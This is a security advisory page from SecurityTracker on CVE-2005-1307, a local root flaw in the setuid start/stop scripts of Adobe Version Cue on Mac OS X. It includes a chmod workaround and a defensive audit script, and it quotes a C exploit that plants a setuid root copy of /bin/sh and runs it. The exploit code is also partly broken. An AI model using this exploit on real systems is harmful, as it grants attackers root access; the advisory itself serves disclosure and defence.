SecurityTracker.com

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Adobe Version Cue
Vendors:   Adobe Systems Incorporated
(Exploit is Available) Adobe Version Cue Start/Stop Scripts Let Local Users Execute Arbitrary Code With Root Privileges
SecurityTracker Alert ID:  1014023
SecurityTracker URL:  http://securitytracker.com/id/1014023
CVE Reference:   CVE-2005-1307
Date:  May 21 2005
Impact:   Execution of arbitrary code via local system, User access via local system
Exploit Included:  Yes  
Version(s): 1.0, 1.0.1
Description:   A vulnerability was reported in Adobe Version Cue on Mac OS X. A local user can obtain root privileges on the target system.

The scripts used to start and stop Adobe Version Cue are configured with set user id (setuid) root user privileges and do not validate the path names.

A local user can create specially crafted scripts and modify the current path to point to the directory containing those scripts. Then, when Adobe Version Cue is started or stopped, the scripts will run with root user privileges.

Jonathan Bringhurst reported this vulnerability.

Impact:   A local user can execute arbitrary code with root privileges on the target system.
Solution:   No vendor solution was available at the time of this entry.

The author of the report has provided the following temporary workaround (which may disable some Adobe Version Cue functions):

'sudo chmod 0755 /Applications/Adobe\ Version\ Cue/stopserver.sh'
'sudo chmod 0755 /Applications/Adobe\ Version\ Cue/startserver.sh'
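
To confirm the workaround took effect, and to find other scripts with the same problem, the following added example (not part of the original advisory or the reporter's message) lists setuid/setgid files that begin with a `#!` interpreter line. The helper name `find_setid_scripts` and the directory passed to it are assumptions.

```shell
#!/bin/sh
# Added example: audit a directory tree for setuid/setgid *scripts*,
# the condition described in this advisory.
# find_setid_scripts is a hypothetical helper name, not an Adobe or OS tool.

# Prints one line per hit: "<mode string> <owner> <path>"
find_setid_scripts() {
    dir=$1
    # -perm -4000 matches the setuid bit, -perm -2000 the setgid bit.
    find "$dir" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while IFS= read -r f; do
        # Only report interpreter scripts: first two bytes are "#!".
        # tr strips NUL bytes so binaries do not trigger shell warnings.
        magic=$(head -c 2 "$f" 2>/dev/null | tr -d '\0')
        [ "$magic" = "#!" ] || continue
        # ls -ld is used because stat(1) flags differ between macOS and Linux.
        meta=$(ls -ld "$f" | awk '{print $1, $3}')
        printf '%s %s\n' "$meta" "$f"
    done
}

# Run against a directory given on the command line, for example:
#   sh audit.sh "/Applications/Adobe Version Cue"
if [ "$#" -gt 0 ]; then
    find_setid_scripts "$1"
fi
```

An empty result after applying the `chmod 0755` workaround means neither script still carries the setuid or setgid bit.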

Vendor URL:  www.adobe.com/products/creativesuite/versioncue.html
Cause:   State error
Underlying OS:  UNIX (macOS/OS X)
Underlying OS Comments:  10.3.6

Message History:   This archive entry is a follow-up to the message listed below.
Dec 7 2004 Adobe Version Cue Start/Stop Scripts Let Local Users Execute Arbitrary Code With Root Privileges



 Source Message Contents

Subject:  Mac OS X - Adobe Version Cue local root exploit [c version exploit]




/************************************************************************************************\
 [ Mac OS X - Adobe Version Cue local root exploit ]                                           
                    c version exploit                                                    
                --=== by ActionSpider ===--                                       
                     Iam sun-os hehehe                                          			                 ActionSpider@Linuxmail.org   
                                    

[http://www.Ashiyane.com] 
[http://www.Ashiyane.net]                                        
[http://defacers.com.mx ]		                                 
           			                                                                         
*************************************************************************************************|                               
                                                               
Greetz to: [ Behrooz & Nima  &  Ehsan & str0ke & Status-x  & Mafia_Boy  &  stealh  ]           
&&                                                                                               
Greetz to: [  and all member of SegmentationFault Group                                          
                                                                                                 Code written By ActionSpider Mac
 OS X - Adobe Version [C] version Exploit;)                                                                        
\************************************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>


int main(){
int x =1;
char a= "root";


printf("\t[ Mac OS X - Adobe Version Cue local root exploit ]\n");
printf("\t\t--==Code written By ActionSpider==--\n");
printf("\t\t --=ActionSpider@Linuxmail.org=--\n");
printf("\t\t\t[ www.Ashiayne.com ]\n\n\n");


printf("w8 for geting root man...\n");
for (x=1;x<=75;x++){
	printf("#");}
					 


printf("\nyour id now:");
system("id");
printf("touch productname.sh...");
system("echo cp /bin/sh /Users/$USER; >> productname.sh");
system("echo chmod 4755 /Users/$USER/sh; >> productname.sh");
system("echo chown root /Users/$USER/sh >> productname.sh");
printf("chmod productname.sh 0755");
system("chmod 0755 ./productname.sh");
printf("ok w8 for touch link...");
system("ln -s $path/stopserver.sh");
printf("exection it :p hehe\n");
system("./stopserver.sh");
system("./sh");
printf("ok w8 for see system rooted or not \n\n");


system("id");
       if (system("whoami") == a)
printf("\n\n ok system now rooted hehe...:P");
       else 
printf("sory this server is patch :(\n");
						
}






           
	
	

 
 



Copyright 2019, SecurityGlobal.net LLC